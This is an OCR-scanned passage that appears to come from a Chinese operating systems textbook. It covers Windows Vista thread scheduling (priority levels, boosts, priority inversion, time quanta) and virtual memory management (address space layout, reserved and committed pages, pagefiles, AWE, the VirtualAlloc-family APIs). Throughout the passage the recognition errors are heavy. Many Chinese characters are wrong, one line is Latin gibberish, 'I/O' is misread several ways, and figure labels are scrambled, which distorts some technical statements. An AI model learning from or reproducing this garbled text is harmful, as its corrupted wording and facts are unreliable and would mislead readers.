的 内 存 中 。 调 度 管理 器 可 以 感知 多 处 理 器 的 环境 ， 并 且 每 一 个 处 理 需 
有 自己 的 内 存 ， 可 以 运行 需要 任意 大 小 内 存 空间 的 程序 一 一 但 是 如 果 
内 存 不 在 本 地 ， 则 会 花费 较 大 的 时 间 开 销 。 这 些 系统 被 认为 是 NUMA 

( 非 统 一 内 存 地 址 ) 设备 。 调 度 管理 器 努力 优化 线程 在 这 类 计算 机 上 
的 分 配 。 当 线程 出 现 缺 页 错误 时 ， 内 存 管理 器 努力 把 属于 理想 处 理 央 
的 NUMA 节 点 的 物理 页 面 分 配给 线程 。 


队 首 的 队列 在 图 11-28 中 表示 。 这 个 图 表明 实际 上 有 四 类 优先 等 
级 : 实时 级 、 用 户 级 、 零 页 和 空 闪 级 , 即 当 它 为 -1 时 有 效 。 这 些 值得 我 
们 深入 讨论 。 优 先 级 16~31 属 于 实时 级 的 一 类 ， 用 来 为 构建 满足 实时 
性 约束 的 系统 。 处 于 实时 级 的 线程 优先 于 任何 动态 分 配 级 别 的 线程 ， 
但 是 不 先 于 DPC 和 ISR。 如 果 一 个 实时 级 的 应 用 程序 想 要 在 系统 上 运 
行 ， 它 就 要 求 设备 驱动 不 能 运行 DPC 和 ISR 更 多 的 额外 时 间 ， 因 为 这 样 
可 能 导致 这 些 实时 线程 错过 它们 的 截止 时 间 。 


优先 级 (31 — 
下 一 个 要 运行 的 线程 


系统 
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图 11-28 Windows Vista 为 线程 支持 32 个 优先 级 


用 户 态 下 不 能 运行 实时 级 的 线程 。 如 果 一 个 用 户 级 线程 在 一 个 高 
优 和 级 运行 ， 比 如 说 ， 键 盘 或 者 鼠标 线程 进入 了 一 个 死 循环 ， 键 盘 或 
者 鼠标 永远 得 不 到 运行 从 而 系统 被 有 效 地 挂 起 。 把 优先 级 设置 为 实时 
级 的 权限 ， 需 要 局 用 进程 令 牌 中 相应 的 特权 。 通 种 用 户 没有 这 个 特 
权 。 


应 用 程序 的 线程 通常 在 优先 级 1~15 上 运行 。 通 过 设 定 进程 和 线程 
的 优先 级 ， 一 个 应 用 程序 可 以 决定 哪些 线程 得 到 偏爱 (获得 更 高 优先 


级 ) 。ZeroPage 系 统 线程 运行 在 优先 级 0 并 且 把 所 有 要 释放 的 页 转化 为 
全 部 包含 0 的 页 。 每 一 个 实时 的 处 理 絮 都 有 一 个 独立 的 ZeroPage 线 程 。 


每 个 线程 都 有 一 个 基于 进程 优先 级 的 基本 优先 级 和 一 个 线程 自己 
的 相对 优先 级 。 用 于 决定 一 个 线程 在 32 个 列表 中 的 哪 一 个 列表 进行 排 
队 的 优先 级 取决 于 当前 优先 级 ， 通 第 是 得 到 和 当前 线程 的 基本 优先 级 
一 样 的 优先 级 ， 但 并 不 总 是 这 样 。 在 特定 的 情况 下 ， 非 实时 线程 的 当 
前 优先 级 被 内 核 一 下 子 提 到 尽 可 能 高 的 优先 级 (但 是 不 会 超过 优先 级 
15) 。 因 为 图 11-28 的 排列 以 当前 的 优先 级 为 基础 ， 所 以 改变 优先 级 可 
以 影响 调度 。 对 于 实时 优先 级 的 线程 ， 没 有 任何 的 调整 。 


现在 让 我 们 看 看 一 个 线程 在 什么 样 的 时 机 会 得 到 提升 。 首 和 完 ， 当 
输入 输出 操作 完成 并 且 唤 醒 一 个 等 行 线程 的 时 候 ， 优 先 级 一 下 于 被 捉 
高 ， 给 它 一 个 快速 运行 的 机 会 ， 这 样 可 以 使 更 多 的 WO 可 以 得 到 处 理 。 
这 里 保证 VO 设备 处 于 忙碌 的 运行 状态 。 提 升 的 幅度 依赖 于 输入 输出 设 
E, AMEE A TIT IR, BT RST TIM, CPO TH, 
8 级 对 应 于 声卡 。 


其 次 ， 如 末 一 个 线程 在 等 待 信号 量 ， 互 不 量 同 步 或 其 他 的 事件 ， 
当 这 些 条 件 满足 线程 被 唤醒 的 时 候 ， 如 果 它 是 前 台 的 进程 (该 进程 控 
制 键盘 输入 发 送 到 的 窗口 ) 的 话 ， 这 个 线程 就 会 得 到 两 个 优先 级 的 提 
升 ， 其 他 情况 则 只 提升 一 个 优先 级 。 这 倾 辐 于 把 交互 式 的 进程 优先 级 


提升 到 8 级 以 上 。 最 后 ， 如 果 一 个 窗口 输入 就 绪 使 得 图 形 用 户 接口 线程 
被 唤醒 ， 它 的 优先 级 同样 会 得 到 大 幅 提 升 。 


提升 不 是 永远 的 。 优 先 级 的 提升 是 立刻 发 生 作用 的 ， 并 且 会 引起 
处 理 器 的 再 次 调度 。 但 是 如 果 一 个 线程 用 完 它 的 时 间 分 配 量 ， 它 就 会 
降低 一 个 优先 级 而 且 排 在 新 优先 级 队列 的 队 尾 。 如 采 它 两 次 用 完 一 个 
完整 的 时 间 配 额 , 它 束 会 再 降 一 个 优先 级 ， 如 此 下 去 直到 降 到 它 的 基本 
优先 级 ， 在 基本 优先 级 得 到 保持 不 会 再 降 ， 直 到 它 的 优先 级 再 次 得 到 
提升 。 


还 有 一 种 情况 就 是 系统 变动 (fiddle) 优先 级 。 假 设 有 二 个 线程 正 
在 一 个 生产 者 -消费 者 类 型 问题 上 一 起 协同 工作 。 生 产 者 的 工作 需要 更 
多 的 资源 ， 因 此 ， 它 得 到 高 的 优先 级 ， 例 如 说 12， 而 消费 者 得 到 的 优 
先 级 为 4。 在 特定 的 时 刻 ， 生 产 者 已 经 把 共享 的 缓冲 区 填 满 ,信号 量 发 生 
阻塞 ， 如 图 11-29a 所 示 。 


在 信号 量 上 执行 down 
操作 ， 然 后 阻塞 


3 在 信号 量 上 执行 
就 绪 up 操作 ， 但 未 被 调度 


a) 


Al 11-29 优先 级 转 置 的 示例 


如 图 11-29b 所 示 ， 在 消费 者 得 到 调度 再 次 运行 之 前 ， 一 个 无 关 的 线 
程 在 优先 级 8 已 束 绪 得 到 调度 运行 。 只 要 这 个 线程 想 要 运行 , 它 将 会 一 直 
运行 ， 因 为 这 个 线程 的 优先 级 高 于 消费 者 的 优先 级 ， 而 比 它 优先 级 高 
的 生产 考 由 于 阻塞 也 不 能 够 运行 。 在 这 种 情况 下 ， 直 到 优先 级 为 8 的 线 
程 运行 完毕 ， 生 产 痢 才 有 机 会 再 次 运行 


Windows 通 过 一 个 称 为 大 hack 来 解决 此 类 问题 的 。 系 统 记 录 一 个 已 
就 绪 的 线程 目 从 上 次 得 到 运行 后 距离 当前 的 时 间 有 多 久 。 如 果 它 超过 
一 个 特定 的 靖 值 ， 它 就 被 提升 到 15 级 的 优先 级 并 得 到 两 个 时 间 配 额 的 
运转 。 这 吏 可 能 解决 生产 着 阻塞 的 情况 。 在 两 个 时 间 配 额 用 完 之 后 ， 
它 的 优先 级 一 下 于 义 回 到 原来 的 优先 级 而 不 是 逐 级 别 地 绥 慢 下 降 到 原 
来 的 优先 级 。 或 许 较 好 的 解决 方法 是 把 那些 用 完 时 间 配 额 的 线程 的 优 
先 级 不 断 地 降低 。 和 毕竟 ， 问 题 不 是 由 饥饿 的 线程 所 引起 的 ， 而 古 由 仿 


梦 线 程 造成 的 。 这 一 问题 广为人知 地 称 作 优先 级 倒转 (priority 


inversion) 。 


在 优先 为 16 条 线程 获得 互 不 量 却 长 时 间 得 不 到 调度 的 时 候 会 发 生 
一 个 类 似 的 问题 ， 致 使 更 重要 的 系统 线程 由 于 等 待 互 斥 量 而 不 能 运行 
发 生 包 俄 。 这 一 问题 在 操作 系统 里 通过 在 那些 只 需要 短 时 间 拥 有 互 不 
量 的 线程 在 很 忙 时 禁用 调度 来 解决 。 (在 一 个 多 处 理 嚣 上， 一 个 Spin 锁 
应 被 使 用 。) 


在 离开 调度 的 主题 之 前 ， 关 于 时 间 配 额 值得 再 讨论 一 下 。 在 
Windows 客 户 咒 系统 上 ， 黑 认 值 是 20 坚 秒 。 在 Windows 服 务 器 系统 
它 是 180 毫 秒 。 短 的 时 间 配 额 在 交互 性 上 会 更 好 些 ， 然 而 长 的 时 间 配 额 
能 减少 切换 提高 效率 。 如 果 需 要 ， 时 间 配 额 可 以 手动 地 设置 成 默认 值 
的 2 倍 、4 倍 或 6 倍 。 


最 后 对 调度 算法 来 说 ， 当 新 窗口 变 成 前 台 窗 口 的 时 候 ， 它 的 全 部 
在 窗口 中 注册 的 线程 都 会 得 到 一 个 较 长 的 时 间 配额 。 这 一 个 变化 给 它 
们 较 多 的 处 理 器 时 间 ， 从 而 为 这 些 窗口 刚刚 转移 到 前 从 的 应 用 程序 市 
来 了 更 好 的 用 户 体 验 。 


11.5 内存 管理 


Windows Vista 有 一 个 极端 复杂 的 虚拟 内 存 系统 。 这 一 系统 包括 了 
大 量 Win32 函 数 ， 这 些 函 数 通 过 内 存 管理 侨 (NTOS 执 行 层 最 大 的 组 
件 ) 来 实现 。 在 下 面 章节 中 ， 我 们 将 依次 了 解 它 的 基本 概念 、Win32 的 
API 调 用 以 及 它 的 实现 。 


11.5.1 基本 概念 


在 Windows Vista 系 统 中 ， 每 个 用 户 进程 都 有 它 自己 的 虚拟 地 址 罕 
间 。 对 于 x86 机 器 ， 虚 拟 地 址 是 32 位 的 ; 因此 ， 每 个 进程 拥有 4GB 大 小 
的 虚拟 地 址 空间 。 其 中 用 户 态 进程 的 虚拟 地 址 大 小 为 2GB (在 服务 器 
系统 中 ， 用 户 态 进程 的 虚拟 地 址 大 小 可 以 配置 成 3GB) 。 另 外 的 2GB 
(或 1GB) 空间 为 内 核 进程 所 用 。 对 于 运行 在 64 位 上 的 x64 机 器 而 言 ， 
地 址 可 以 是 32 位 的 也 可 以 是 64 位 的 。32 位 地 址 是 为 了 应 用 那些 “需要 通 
过 WOW64 来 运行 在 64 位 系统 上 的 32 位 进程 ?而 保留 的 。 由 于 内 核 拥 有 
大 量 可 用 的 地 址 空间 ， 如 果 需 要 的 话 ，32 位 进程 可 以 使 用 全 部 4GB 大 
小 的 地 址 空间 。 对 于 x86 和 x64 机 器 ， 虚 拟 地 址 空间 需要 分 页 ， 并 且 页 
的 大 小 一 般 都 是 固定 在 4KB 一 一 虽然 在 有 些 情况 下 每 页 的 大 小 也 可 被 
分 为 4MB 〈 通 过 只 使 用 页 目录 而 忽略 掉 页 表 ) ° 


图 11-30 表 示 了 三 个 x86 进 程 的 虚拟 地 址 空间 。 每 个 进程 的 底部 和 项 
端 64KB 的 虚拟 地 址 空间 通常 保留 不 用 。 这 种 做 法 是 为 了 辅助 发 现 程序 
错误 而 设置 的 。 无 效 的 指针 通 向 标志 为 0 或 者 -1， 使 用 这 样 的 指针 会 导 
致 立即 陷入 中 断 ， 而 不 会 读 取 垃圾 信息 、 甚 至 写 入 错误 的 内 存 地 址 。 


进 REA PE 程 B 进程 C 
4 GB 进程 


POA 
换 页 内 存 池 


HAL + OS 


2 GB FE LTR 


进程 C 的 私有 
代码 和 数据 


进程 A 的 私有 进程 B 的 私有 
代码 和 数据 代码 和 数据 


下 底部 和 顶部 的 64KB 空 间 是 无 效 的 


Al 11-30 x86 三 个 用 户 进 程 的 虚拟 地 址 空间 。 日 色 的 区 域 为 每 个 进程 
私有 的 。 阴 影 的 区 域 为 所 有 的 进程 共 孚 


从 64KB 开 始 为 用 户 私有 的 代码 和 数据 。 这 些 空 间 可 以 扩充 到 几乎 
2 个 GB。 而 最 顶端 的 2GB 包 含 了 操作 系统 部 分 ， 包 括 代 码 、 数 据 、 换 页 
内 存 池 和 非 换 页 内 存 池 。 除 了 每 一 进程 的 虚拟 内 存 数据 ( 像 页 表 和 工 
作 集 的 列表 ， 上 面 的 2GB 全 部 作为 内 核 的 虚拟 内 存 、 并 在 所 有 的 用 
户 进程 之 中 共享 。 内 核 虚 拟 内 存 仅 在 内 核 态 才 可 以 访问 。 共 享 进 程 在 


内 核 部 分 的 虚拟 内 存 的 原因 是 : 当 一 个 线程 进行 系统 调用 的 时 候 ， 它 
陷入 内 核 态 之 后 不 需要 改变 内 存 映 射 。 所 有 要 做 的 只 是 切换 到 线程 的 
内 核 栈 。 由 于 进程 在 用 户 态 下 的 页 面 仍然 是 可 访问 的 ， 内 核 态 下 的 代 
码 在 恋 取 参数 和 访问 缓冲 时 ， 融 不 用 在 地 址 空间 之 间 来 回 切换 、 或 者 
临时 将 页 面 进 行 两 次 映射 。 这 里 的 权衡 是 通过 用 较 小 的 进程 入 有 地 址 
空间 ， 来 换取 更 快 的 系统 调用 。 


当 运 行 在 内 核 态 的 时 候 ，Windows 人 允许 线程 访问 其 余 的 地 址 空间 。 
这 样 该 线程 束 可 以 访问 所 有 用 户 仿 的 地 址 空间 ， 以 及 对 该 进程 来 说 通 
种 不 可 访问 的 内 核 地 址 空间 中 的 区 域 ， 例 如 页 表 的 目 映射 区 域 。 在 线 
程 切换 到 用 户 仿 之 前 ， 必 须 切换 到 它 最 初 的 地 址 空间 。 


1. 虚 拟 地 址 分 配 


虚拟 地 址 的 每 页 处 于 三 种 状态 之 一 : 无效 、 保 留 或 提交 。 无 效 页 
H (invalid page) 征 指 一 个 页 面 没有 被 映射 到 一 个 内 存 区 对 象 (section 
object) ， 对 它 的 访问 会 引发 一 个 相应 的 页 面 失 效 。 一 旦 代码 或 数据 被 
映射 到 虚拟 页 面 ， 就 说 一 个 页 面 处 于 提交 (committed) 状态 。 在 提交 
的 页 上 发 生 页 面 失效 会 导致 如 下 情况 : 将 一 个 包含 了 引起 失效 的 虚拟 
地 址 的 页 面 映射 到 这 样 的 页 面 一 一 由 内 存 区 对 象 所 表示 ， 或 被 保存 于 
页 面 文 件 之 中 。 这 种 情况 通常 发 生 在 需要 分 配 物 理 页 面 ， 以 及 对 内 存 
区 对 象 所 表示 的 文件 进行 WO 来 从 硬 副 读 取 数据 的 时 候 。 但 是 页 面 失效 
的 发 生 也 可 能 是 页 表 正 在 更 新 而 造成 的 ， 即 物理 页 面 仍 在 内 存 的 高 速 


缓存 中 ， 这 种 情况 下 不 需要 进行 1JO。 这 些 叫 做 软 异 常 (soft fault) , 
稍 后 我 们 会 更 详细 地 讨论 它们 。 


虚拟 页 面 还 可 以 处 于 保留 的 (reserved) 状态 。 保 留 的 虚拟 页 是 无 
效 的 ， 但 是 这 些 页 面 不 能 被 内 存 管 理 器 用 于 其 他 目的 而 分 配 。 例 如 ， 
当 创建 一 个 新 线程 时 ， 用 户 态 栈 空间 的 许多 页 保留 于 进程 的 虚拟 地 址 
空间 ， 仪 有 一 个 页 面 是 提交 的 。 当 栈 增长 时 ， 虚 拟 内 存 管理 器 会 自动 
提交 额外 的 页 面 ， 直 到 保留 页 面 耗 尽 。 保 留 页 面 的 功效 是 : 可 以 保证 
栈 不 会 太 长 而 覆盖 其 他 进程 的 数据 。 保 留 所 有 的 虚拟 页 意味 着 栈 最 终 
可 以 达到 它 的 最 大 尽 寸 ， 而 栈 所 需要 的 连续 虚拟 地 址 空间 的 页 面 ， 也 
\ 会 有 用 于 其 他 用 途 的 风险 。 除 了 无 效 、 保 留 、 提 交 状 态 ， 页 面 还 有 
其 他 的 属性 : 可 读 、 可 写 及 可 运行 《在 AMD64 兼 容 的 处 理 器 下 ) 。 


2. 页 面 文件 


天 于 后 备 存 依 闫 的 分 配 有 一 个 有 趣 的 权衡 ， 已 提交 页 面 没有 被 映 
射 于 特定 文件 。 这 些 页 使 用 了 页 面 文件 (pagefile) ° 问题 是 该 如 何以 
及 何 时 把 虚拟 页 映射 到 页 面 文件 的 特定 位 置 。 一 个 简单 的 策略 古 : 当 
一 个 页 被 提交 时 ， 为 虚拟 页 分 配 一 个 硬 列 上 页 面 文件 中 的 页 。 这 会 确 
保 对 于 每 一 个 有 必要 换 出 内 存 的 已 提交 页 ， 都 有 一 个 确定 的 位 置 写 回 
Sie 


Windows 使 用 一 个 适时 (just-in-time) 策略 。 直 到 需要 被 换 出 内 存 
之 前 ， 在 页 面 文件 中 的 具体 空间 不 会 分 配给 已 提 区 的 页 面 。 人 硬盘 空间 
当然 不 需要 分 配给 永远 不 换 出 的 页 面 。 如 有 果 总 的 虚拟 内 存 比 可 用 的 物 
理 内 存 少 ， 则 根本 不 需要 页 面 文件 。 这 对 基于 Windows 的 坐 入 式 系统 是 
很 方便 的 。 这 也 是 系统 局 动 时 的 方式 ， 因 为 页 面 文件 是 在 第 一 个 用 户 
态 进 程 smss.exe 局 动 之 后 才 初 始 化 的 。 


在 预 分 配 策略 下 ， 用 于 私有 数据 (如 栈 、 写 时 复制 代码 页 ) 的 全 
部 虚拟 内 存 受到 页 面 文件 大 小 的 限制 。 通 过 适时 分 配 的 策略 ， 总 的 虚 
拟 内 存 大 小 是 物理 内 存 和 页 面 文件 大 小 的 总 和 。 有 既然 相对 物理 内 存 来 
说 硬 表 足够 大 与 便宜 ， 提 升 性 能 的 需求 自然 比 空间 的 节省 更 重要 。 


有 关 请 求 调 页 ， 需 要 马上 进行 初始 化 从 硬盘 读 取 页 的 请 求 一 一 因 
为 在 页 入 (page-in) 操作 完成 之 前 ， 遇 到 页 面 失效 的 线程 无 法 继续 运 
行 下 去 。 对 于 失效 页 面 的 一 个 可 能 的 优化 是 : 在 进行 一 次 MO 操作 时 预 
调 入 一 些 额 外 的 页 面 。 然 而 ， 对 于 修改 过 的 页 写 回 磁 强 和 线程 的 执行 
一 般 并 不 是 同步 的 。 对 于 分 配 页 面 文件 空间 的 适时 策略 便 是 利用 这 一 
点 ， 在 将 修改 过 的 页 面 写 入 页 面 文件 时 提升 性 能 : 修改 过 的 页 面 被 集 
中 到 一 起 ， 统 一 进行 写 入 操作 。 由 于 只 有 当 页 面 被 写 回 时 页 面 文件 的 
空间 才 真 正 被 分 配 ， 可 以 通过 排列 使 页 面 文件 中 的 页 面 较为 接近 甚至 
连续 ， 来 对 大 批 写 回 页 面 时 的 寻找 次 数 进行 优化 。 


当 存储 在 页 面 文件 中 的 页 被 读 取 到 内 存 中 时 ， 直 到 它们 第 一 次 被 
修改 之 前 ， 这 些 页 面 一 直 保 持 它们 在 页 面 文件 中 的 位 置 。 如 来 一 个 页 
面 从 没 被 修改 过 ， 它 将 会 进入 到 一 个 空 几 物理 页 面 的 列表 中 去 一 一 这 
个 表 称 作 后 备 链表 (standby list) ， 这 个 表 中 的 页 面 可 以 不 用 写 回 硬盘 
而 再 次 被 使 用 。 如 末 它 被 修 改 ， 内 存 管理 此 将 会 释放 页 面 文件 中 的 
Th, 并且 内 存 将 保留 这 个 页 的 惟一 副本 。 这 古 内 存 管理 融通 过 把 一 个 
加 载 后 的 页 标识 为 只 读 来 实现 的 。 线 程 第 一 次 试图 写 一 个 页 时 ， 内 存 
管理 天 检测 到 它 所 处 的 情况 并 释放 页 面 文件 中 的 页 ， 再 授权 写 操作 给 
相应 的 页 ， 之 后 让 线程 再 次 进行 党 试 。 


Windows 文 持 多 达 16 个 页 面 文 件 ， 通 常 窗 盖 到 不 同 的 磁 副 来 达到 较 
高 的 O 带 宽 。 每 一 个 页 面 文件 都 有 初始 的 大 小 和 随后 依 需 要 可 以 增长 
到 的 最 大 空间 ， 但 是 在 系统 安装 时 就 创建 这 些 文件 达到 它 的 最 大 值 是 
最 好 的 。 如 果 当 文件 系统 非常 满 却 需要 增长 页 面 文件 时 ， 页 面 文件 的 
新 空间 可 能 会 由 多 个 碎片 所 组 成 ， 这 会 降低 系统 的 性 能 。 


操作 系统 通过 为 进程 的 私有 页 写 入 映射 信息 到 页 表 入 口 ， 或 与 原 
页 表 入 口 相对 应 的 共享 页 的 内 存 区 对 象 ， 来 跟踪 虚拟 页 与 页 面 文件 的 
映射 天 系 。 除 了 被 页 面 文件 保留 的 页 面 外 ， 进 程 中 的 许多 页 面 也 被 映 
别 到 文件 系统 中 的 普通 文件 。 


程序 文件 中 的 可 执行 代码 和 只 读数 据 (例如 EXE 或 DLL) 可 以 映 
喘 到 任何 进程 正在 使 用 的 地 址 空间 。 因 为 这 些 页 面 无 法 被 修改 ， 它 们 
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序 文 件 中 将 其 读 入 。 


有 时 候 页 面 开 始 时 为 只 读 但 最 终 被 修改 。 例 如 ， 当 调试 进程 时 在 
代码 中 设 定 中 断后 ， 或 将 代码 重 定 癌 为 进程 中 不 同 的 地 址 ， 或 对 于 开 
始 时 为 共享 的 数据 页 面 进行 修改 。 在 这 些 情况 下 ， 像 大 多 数 现代 操作 
系统 一 样 ，Windows 文 持 写 时 复制 (copy-on-write) 类 型 的 页 面 。 这 些 
页 面 开 始 时 像 普通 的 被 映射 页 面 一 样 ， 但 如 果 试 图 修改 任何 部 分 页 
面 ， 内 存 管理 器 将 会 建立 一 份 私有 的 、 可 写 的 副本 。 然 后 它 更 新 虚拟 
页 面 的 页 表 ， 使 之 指 同 那个 私有 副本 ， 并 且 使 线程 重 狐 进行 号 操作 
一 一 这 一 次 将 会 成 功 。 如 有 果 这 个 副本 之 后 需要 被 换 出 内 存 ， 那 么 它 将 
极 写 回 到 页 面 文件 而 不 是 原始 文件 中 。 


除了 从 EXE 和 DLL 文件 映射 程序 代码 和 数据 ， 一 般 的 文件 都 可 以 
映射 到 内 存 中 ， 使 得 程序 不 需要 进行 显 式 的 读 写 操作 就 可 以 从 文件 引 
用 数据 。IO 操 作 仍 然 是 必要 的 ， 但 它们 由 内 存 管理 器 通过 使 用 内 存 区 
对 象 隐 式 提供 ， 来 表示 内 存 中 的 页 面 和 磁 强 中 的 文件 块 的 映射 。 


内 存 区 对 象 并 不 一 定 和 文件 相关 。 它 们 可 以 和 匿名 内 存 区 域 相 
关 。 通 过 映射 匿名 内 存 区 对 象 到 多 个 进程 ， 内 存 可 以 在 不 分 配 三 强 文 
件 的 前 提 下 共享 。 既 然 内 存 区 可 以 在 NT 名 字 空 间 给 予 名 字 ， 进 程 可 以 


通过 用 名 字 打开 内 存 区 对 象 、 或 者 复制 进程 间 的 内 存 区 对 象 句柄 的 方 
式 来 进行 通信 


3. 大 物理 内 存 寻 址 


多 年 前 ， 当 16 位 (或 20 位 ) 的 地 址 空间 还 作为 标准 的 时 候 ， 机 器 
已 有 兆 字 节 的 物理 内 存 ， 人 们 努力 想 出 各 种 技术 使 得 程序 可 以 使 用 更 
多 的 物理 内 存 、 而 不 是 去 适应 有 限 的 地 址 空间 。 这 些 技术 通常 基于 存 
储 器 组 转换 (bank switching) ， 使 得 一 个 程序 可 以 突破 16 或 者 20 位 的 
限制 ， 替 换 掉 上 自己 的 一 些 内 存 块 。 在 刚 引 入 32 位 计算 机 时 ， 大 多 数 桌 
面 计算 机 只 有 几 个 兆 的 物理 内 存 。 然 而 随 着 内 存在 集成 电路 上 变 得 更 
加 密集 ， 可 用 内 存 开 始 迅速 增长 。 这 推动 了 服务 器 的 发 展 ， 因 为 服务 
器 上 的 应 用 程序 往往 需要 更 多 的 内 存 。 英 特 尔 的 Xeon 心 片 支 持 物 理 地 
址 扩展 (PAE) ， 物 理 内 存 寻 址 空间 从 32 位 变 为 36 位 ， 意 味 着 一 个 单一 
的 系统 可 以 支持 高 达 64GB 的 物理 内 存 。 这 远 远 大 于 2G 或 者 3G 一 一 单个 
进程 可 以 在 32 位 的 用 户 模式 寻 址 的 虚拟 地 址 空间 ， 然 而 一 些 像 SQL 数 
据 库 这 样 的 大 型 应 用 软件 恰恰 被 设计 为 运行 在 一 个 单个 进程 的 寻 址 空 
间 中 ， 因 此 存储 器 组 转换 已 经 过 时 了 ， 取 代 它 的 是 地 址 窗口 扩展 
(Address Windowing Extensions, AWE) 。 这 种 机 制 允许 程序 (以 正 
确 的 特权 级 运行 ) 去 请 求 物理 内 存 的 分 配 。 进程 可 以 保留 所 需 的 虚拟 
地 址 ， 并 请 求 操作 系统 进行 虚拟 地 址 与 物理 地 址 间 的 映射 。 在 所 有 的 
服务 器 应 用 64 位 寻 址 方式 前 ，AWE 一 直 充 当权 宜 之 计 的 角色 。 


11.5.2 内存 管 理 系 统 调用 


Win32 API 包 含 了 大 量 的 函数 来 文 持 一 个 进程 显 式 地 管理 它 目 己 的 
虚拟 内 存 ， 其 中 最 重要 的 函数 如 图 11-31 所 示 。 它 们 都 是 在 包含 一 个 单 
独 的 页 或 一 个 由 两 个 或 多 个 在 虚拟 地 址 空间 中 连续 页 的 序列 的 区 域 上 
进行 操作 的 。 


前 四 个 API 芳 数 是 用 来 分 配 、 释 放 、 保 护 和 查询 虚拟 地 址 空间 中 的 
区 域 的 。 被 分 配 的 区 域 总 是 从 64KB 的 边界 开始 ， 以 尽量 减少 移植 到 将 
来 的 体系 结构 的 问题 (因为 将 来 的 体系 结构 可 能 使 用 比 当 前 使 用 的 页 
更 大 的 页 ) 。 实 际 分 配 的 地 址 空间 可 以 小 于 64KB， 但 是 必须 是 一 个 页 
大 小 的 整数 倍 。 接 下 来 的 两 个 API 给 一 个 进程 把 页 面 固定 到 内 存 中 以 防 
止 它们 被 玲 换 到 外 存 以 及 撤销 这 一 性 质 的 功能 。 举 例 来 说 ， 一 个 实时 
程序 可 能 需要 它 的 页 面具 有 这 样 的 性 质 以 防止 在 关键 操作 上 发 生 页 面 
失效 。 控 作 系 统 强加 了 一 个 限制 来 防止 一 个 进程 过 于 “ 仙 焚 ”*， 这 些 页 
面 能 够 移出 内 存 ， 但 十 仅仅 在 整个 进程 被 车 换 出 内 存 的 时 候 才 能 这 人 么 
做 。 当 该 进程 被 重新 闭 入 内 存 时 ， 所 有 之 前 被 指定 固定 到 内 存 中 的 页 
会 在 任何 线程 开始 运行 之 前 被 重新 装 入 内 存 。 尽 管 没 有 从 图 11-31 中 
体现 出 来 ，Windows Vista 还 包含 一 些 原生 API 芳 数 来 允许 一 个 进程 访问 
其 他 进程 的 虚拟 内 存 。 前 提 是 该 进程 被 给 予 了 控制 权 ， 即 它 拥有 一 个 
相应 的 句柄 。 


Win32 API 函数 

VirtualAlloc 保留 或 提交 一 个 区 域 

VirtualFree 释放 或 解除 提交 一 个 区 域 

VirtualProtect 改变 在 一 个 区 域 上 的 读 / 写 /执行 保护 
VirtualQuery 查询 一 个 区 域 的 状态 

VirtualLock 使 一 个 区 域 常 驻 内 存 ( 即 不 允许 被 蔡 换 到 外 存 ) 


VirtualUnlock 使 一 个 区 域 以 正常 的 方式 参与 页 面 奉 换 策略 
CreateFileMapping 创建 一 个 文件 映射 对 象 并 且 可 以 选择 是 否 赋予 该 对 象 一 个 名 字 
MapViewOfFile 映射 一 个 文件 〈 或 一 个 文件 的 一 个 部 分 ) 到 地 址 空间 中 
UnmapViewOfFile 从 地 址 空间 中 删除 一 个 被 映射 的 文件 

OpenFileMapping 打开 一 个 之 前 创建 的 文件 映射 对 象 


A] 11-31 Windows 中 用 来 管理 虚拟 内 存 的 主要 的 Win32 API 函数 


列 出 的 最 后 四 个 API 函 数 是 用 来 管理 内 存 映射 文件 的 。 为 了 映射 一 
个 文件 ， 首 先 必须 通过 调用 CreateFileMapping 来 创建 一 个 文件 映射 对 象 
( 见 图 11-23) 。 这 个 函数 返回 一 个 文件 映射 对 象 〈 即 一 个 内 存 区 对 
象 ) 的 句柄 ， 并 且 可 以 选择 是 否 为 该 操作 添加 一 个 名 字 到 Win32 地 址 空 
间 中 ， 从 而 其 他 的 进程 也 能 够 使 用 它 。 接 下 来 的 两 个 函数 从 一 个 进程 
的 虚拟 地 址 空间 中 映射 或 取消 映射 内 存 区 对 象 之 上 的 视图 。 最 后 一 个 
API 能 被 一 个 进程 用 来 映射 其 他 进程 通过 调用 CreateFileMapping 创 建 并 
共享 出 来 的 映射 ， 这 样 的 映射 通常 是 为 了 映射 匿名 内 存 而 建立 的 。 通 
过 这 样 的 方式 ， 两 个 或 多 个 进程 能 够 共享 它们 地 址 空间 中 的 区 域 。 这 
一 技术 允许 它们 写 内 容 到 相互 的 虚拟 内 存 的 受 限 的 区 域 中 。 


11.5.3 ”存储 管理 的 实现 


运行 在 x86 处 理 器 上 的 Windows Vista 操 作 系统 为 每 个 进程 都 单独 提 
供 了 一 个 4GB 大 小 的 按 需 分 页 (demand-paged) 的 线性 地 址 空间 ， 不 支 
持 任 何 形 式 的 分 段 。 从 理论 上 说 ， 页 面 的 大 小 可 以 是 不 超过 64KB 的 2 
的 任何 次 居 。 但 是 在 Pentium 处 理 器 上 ， 页 面 正 常情 况 下 固定 地 设置 成 
4KB 大 小 。 另 外 ， 操 作 系 统 可 以 使 用 4MB 的 页 来 改进 处 理 器 存储 管理 
单元 中 的 快 表 (Translation Lookaside Buffer, TLB) 的 效率 。 内 核 以 及 
大 型 应 用 程序 使 用 了 4MB 大 小 的 页 面 以 后 ， 可 以 显著 地 提高 性 能 。 这 
是 因为 快 表 的 命中 率 提高 了 ， 并 且 访 问 页 表 以 寻找 在 快 表 中 没有 找到 
的 表 项 的 次 数 减 少 了 。 


调度 句 选 择 单 个 线程 来 运行 而 不 太 关 心 进程 ， 存 储 管理 器 则 不 
同 ， 它 完全 是 在 处 理 进 程 而 不 太 关心 线程 。 毕 竟 ， 是 进程 而 非 线 程 拥 
有 地 址 空间 ， 而 地 址 空间 正 是 存储 管理 絮 所 关心 的 。 当 虚拟 地 址 空间 
中 的 一 片区 域 被 分 配 之 后 ， 就 像 图 11-32 中 进程 A 被 分 配 了 4 片区 域 那 
样 ， 存 储 管理 器 会 为 它 创建 一 个 虚拟 地 址 描述 符 (Virtual Address 
Descriptor, VAD) 。VAD 列 出 了 被 映射 地 址 的 范围 ， 用 来 表示 作为 后 
备 存 储 的 文件 以 及 文件 被 映射 区 域 起 始 位 置 的 季 区 以 及 权限 。 当 访问 
第 一 个 页 面 的 时 候 ， 创 建 一 个 页 目录 并 且 把 它 的 物理 地 址 插入 进程 对 
象 中 。 一 个 地 址 空间 被 一 个 VAD 的 列表 所 完全 定义 。VAD 被 组 织 成 平 


衡 树 的 形式 ， 从 而 保证 一 个 特定 地 址 的 描述 符 能 够 被 快速 地 找到 。 这 
个 方案 支持 稀 艳 的 地 址 空间 。 被 映射 的 区 域 之 间 示 使 用 的 地 址 空间 不 
